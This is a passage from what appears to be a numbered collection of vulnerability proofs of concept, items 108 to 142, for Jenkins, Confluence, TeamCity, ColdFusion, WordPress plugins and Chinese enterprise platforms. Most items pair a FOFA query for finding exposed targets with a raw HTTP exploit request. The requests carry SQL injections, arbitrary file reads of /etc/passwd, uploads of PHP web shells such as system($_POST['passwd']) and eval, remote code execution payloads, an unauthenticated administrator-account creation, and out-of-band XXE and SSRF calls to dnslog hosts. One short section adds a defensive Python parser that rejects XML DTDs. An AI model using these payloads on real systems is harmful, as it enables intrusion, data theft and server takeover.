GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "第一步获得的值",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--


117. WordPress LayerSlider plugin SQL injection
version:7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Byzoro (百绰) Smart S42 management platform: arbitrary file upload via userattestation.php
CVE-2024-1918
FOFA: title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Byzoro (百绰) Smart S200 management platform: SQL injection via /importexport.php
CVE-2024-27718
FOFA: title="Smart管理平台"
The sql parameter is base64-encoded, not encrypted: c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to select 1,database(),version(), and the endpoint runs the decoded statement (type=exportexcelbysql).
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection leading to remote code execution
CVE-2023-22527 (identifier not on the original page; it is the text-inline.vm OGNL injection shown here)
FOFA: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The label value is evaluated by Velocity, which hands the OGNL in the x parameter to Struts; the expression runs id through freemarker.template.utility.Execute and writes the output into the X-Cmd-Response response header, so check that header rather than the body.

124. Hunan Jianyan (湖南建研) engineering quality inspection system: arbitrary file upload
FOFA: body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

filePath and fileContent are written to disk as given, so the ASPX lands next to the handler and is reachable at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA: icon_hash="-82958153"
PoC: https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; from there system commands can be executed. Affected: ScreenConnect 23.9.7 and earlier; fixed in 23.9.8 (version details not on the original page).

126. aiohttp path traversal
CVE-2024-23334 (identifier not on the original page). Only static routes registered with follow_symlinks=True are affected, and aiohttp 3.9.2 fixes it; the ComfyUI fingerprint below matches because ComfyUI serves its UI with aiohttp.
FOFA: title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks: XXE via DataExchange.ashx
FOFA: body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

The Params part is parsed with external entities enabled. This is a blind (out-of-band) XXE: the confirmation is the DNS lookup of the dnslog host, not anything in the HTTP response.

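The fix for the class of bug in item 127 is to refuse DTDs before the parser ever sees an entity. The following is an added example, not code from the original page or from Glodon: a Python parser built on the stdlib expat bindings that aborts on the DOCTYPE declaration itself, plus a textual pre-check that can run on raw request bodies at a proxy or in log review. Both sample documents are constructed here; the first reuses the Params part from the request above.

```python
import re
from xml.parsers import expat

# Constructed samples: the Params part from the DataExchange.ashx request, and
# a benign document of the shape the endpoint presumably expects.
XXE_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>"""

BENIGN_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<Params><SystemName>BIM</SystemName></Params>"""


class UnsafeXML(ValueError):
    """Raised when a client document tries to declare a DTD or entity."""


_DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def has_dtd(data: bytes) -> bool:
    """Cheap textual pre-check for raw bodies (WAF / log side): a DOCTYPE or
    ENTITY declaration in form-data XML is a red flag on its own."""
    return _DTD_MARKER.search(data) is not None


def parse_untrusted_xml(data: bytes) -> list:
    """Parse XML from an untrusted client and return the element names seen.

    expat only fetches SYSTEM entities when an ExternalEntityRefHandler is
    installed, but a DOCTYPE still allows internal-entity expansion attacks
    and parameter entities, so the parser aborts as soon as it sees one.
    """
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise UnsafeXML("DOCTYPE %r rejected (system id %r)" % (doctype_name, system_id))

    seen = []
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(data, True)  # an exception raised in a handler propagates from here
    return seen


def is_safe_xml(data: bytes) -> bool:
    """True if the document parses without any DTD and is well-formed."""
    try:
        parse_untrusted_xml(data)
    except (UnsafeXML, expat.ExpatError):
        return False
    return True
```

Use has_dtd() where you only see bytes (a reverse proxy, a packet capture); use parse_untrusted_xml() in the application, since a textual check can be dodged by encoding tricks that a real parser normalises away.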
128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA: app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid (the unauthenticated heartbeat call returns it)
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system: arbitrary file upload
FOFA: icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

The avatar handler trusts the declared image/png Content-Type and keeps the .php extension; the user_name and user_id cookies are arbitrary values, no real session is needed.

131. Mini-Tmall <= 20231017 SQL injection
FOFA: icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

The orderBy value is concatenated into the ORDER BY clause, so a conditional SLEEP gives a time-based blind oracle.

132. JetBrains TeamCity 2023.11.3 and earlier: authentication bypass
CVE-2024-27198
FOFA: body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

The request creates a SYSTEM_ADMIN user without authentication: the handler for a non-existent page forwards to the path in the jsp parameter, and the ";.jsp" suffix satisfies its extension check while the servlet container drops everything after the ";" before routing, so the forward reaches /app/rest/users.

CVE-2024-27199 (same release; a limited path traversal to a few authenticated pages):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Exploit script: CVE-2024-27198-RCE.py
Both issues are fixed in TeamCity 2023.11.4 (fix version not on the original page).

133. H5 cloud mall (H5云商城): file upload via file.php
FOFA: body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

The path is spelled commodtiy as published. The uploaded script deletes itself after one execution (unlink(__FILE__)).

134. Netentsec (网康) NS-ASG application security gateway: SQL injection via index.php
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA: app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

The injection point is the IPAddr field inside the nested messagecontent JSON string; updatexml() leaks select version() through a MySQL error message (error-based).

135. Netentsec (网康) NS-ASG application security gateway: SQL injection via list_ipAddressPolicy.php
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA: app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The oracle is the md5 of 102103122 echoed between tildes in the database error.

136. NextChat SSRF via /api/cors
CVE-2023-49785
FOFA: title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The /api/cors/ route fetches the URL that follows it server-side; a DNS lookup of the dnslog host confirms the SSRF.

137. Fujian Kirisun (科立讯) communication command and dispatch platform: SQL injection via down_file.php
CVE-2024-2620
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

Time-based blind: the response is delayed by about five seconds when the injection works. Items 137 to 140 are the same pattern in four different endpoints of this platform.

138. Fujian Kirisun (科立讯) communication command and dispatch platform: SQL injection via pwd_update.php
CVE-2024-2621
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (科立讯) communication command and dispatch platform: SQL injection via editemedia.php
CVE-2024-2622
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (科立讯) communication command and dispatch platform: SQL injection via get_extension_yl.php
CVE-2024-2566
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (科立讯) communication command and dispatch management platform: SQL injection via ajax_users.php
FOFA: body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

Union-based: the second column of the result is rendered in the response, so md5(1) between tildes is the oracle.

142. CMSV6 vehicle monitoring platform: default credentials
CVE-2024-29666
FOFA: body="/808gps/"
